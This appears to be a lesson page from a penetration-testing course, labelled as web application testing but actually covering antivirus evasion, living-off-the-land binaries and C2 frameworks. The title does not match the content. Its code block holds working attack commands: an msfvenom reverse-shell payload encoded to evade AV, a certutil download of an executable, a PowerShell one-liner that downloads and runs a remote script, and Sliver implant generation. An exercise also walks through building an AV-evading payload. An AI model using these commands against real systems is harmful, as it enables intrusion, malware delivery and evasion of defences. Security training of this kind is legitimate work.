Day 4: Web Application Penetration Testing

Today's Objective

Burp Suite, OWASP testing methodology, SQLMap, and the manual techniques that automated scanners miss — the skills that separate a real web pentest from a checkbox scan.

Antivirus Evasion Techniques

Signature-based AV detects known malware patterns. Bypass techniques: encoding payloads (base64, XOR), using memory-only execution (fileless), obfuscating source code, and using legitimate system binaries (LOLBins). Tools like Veil-Framework, Shellter, and custom Python scripts generate AV-evading payloads. Always test against multiple AV engines.

Living Off the Land (LOLBins)

LOLBins are legitimate Windows/Linux binaries that can be abused for attacker purposes: certutil.exe downloads files, mshta.exe executes scripts, regsvr32.exe loads remote DLLs, rundll32.exe runs arbitrary code. LOLBAS (Windows) and GTFOBins (Linux) catalog all known techniques. EDR solutions now monitor these, but they remain effective against legacy defenses.

C2 Frameworks: Cobalt Strike and Alternatives

Command and Control (C2) frameworks manage post-exploitation sessions across many compromised hosts. Cobalt Strike is the enterprise standard (red teams). Open-source alternatives: Sliver, Havoc, and Covenant. C2 frameworks provide persistence, lateral movement, and exfiltration features unavailable in basic Metasploit sessions.

bash

# Encode a payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=443 \
  -e x64/xor_dynamic -i 10 \
  -f exe -o payload_encoded.exe

# Test detection rate (upload to antiscan.me - no AV reporting)
# Windows LOLBin: certutil download
# certutil.exe -urlcache -f http://192.168.1.50/payload.exe payload.exe

# PowerShell encoded command
$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://192.168.1.50/shell.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded

# Sliver C2 server setup
sliver-server
sliver> generate --mtls 192.168.1.50 --os windows --arch amd64 --save implant.exe

💡

Never test AV evasion on VirusTotal — it shares samples with AV vendors and will burn your techniques. Use antiscan.me or an offline test environment.

📝 Day 4 Exercise

Build an AV-Evading Payload

Generate a standard Meterpreter payload and check its AV detection rate on antiscan.me
Apply XOR encoding with 10 iterations and re-test detection rate
Use Shellter to inject a payload into a legitimate PE binary and test again
Set up a Sliver C2 server and generate an mTLS implant
Compare detection rates across all three payload variants

Day 4 Summary

AV evasion uses encoding, obfuscation, and memory-only execution
LOLBins abuse legitimate system binaries to blend with normal activity
C2 frameworks manage multiple compromised hosts from a central server
Sliver and Havoc are open-source Cobalt Strike alternatives
Test evasion on antiscan.me, never VirusTotal

Challenge

Research and document 5 LOLBins techniques (3 Windows, 2 Linux). For each one, describe the binary, the abuse technique, and the defensive detection method defenders use.

← Previous

Day 3: Network Penetration Testing

Day 5: Professional Reporting & Career

→

What's Next

The foundations from today carry directly into Day 5. In the next session the focus shifts to Reporting and Remediation Guidance — building directly on everything covered here.

Supporting Videos & Reading

Go deeper with these external references.

YouTube

Web Application Penetration Testing — Video Walkthroughs Community tutorials and walkthroughs covering the concepts in this lesson.

→

YouTube

Web Application Penetration Testing Explained Deep-dive explanations and live-coding sessions from top educators.

→

Official Docs

Official Documentation Primary reference documentation for the technologies covered in this lesson.

→

GitHub

Open Source Examples Real-world codebases demonstrating the patterns taught in this lesson.

→

Day 4 Checkpoint

Before moving on, verify you can answer these without looking:

What is the core concept introduced in this lesson, and why does it matter?
What are the two or three most common mistakes practitioners make with this topic?
Can you explain the key code pattern from this lesson to a colleague in plain language?
What would break first if you skipped the safeguards or best practices described here?
How does today's topic connect to what comes in Day 5?

Live Bootcamp

Learn this in person — 2 days, 5 cities

Thu–Fri sessions in Denver, Los Angeles, New York, Chicago, and Dallas. $1,490 per seat. June–October 2026.

Reserve Your Seat →

Continue To Day 5

Day 5: Professional Reporting & Career

→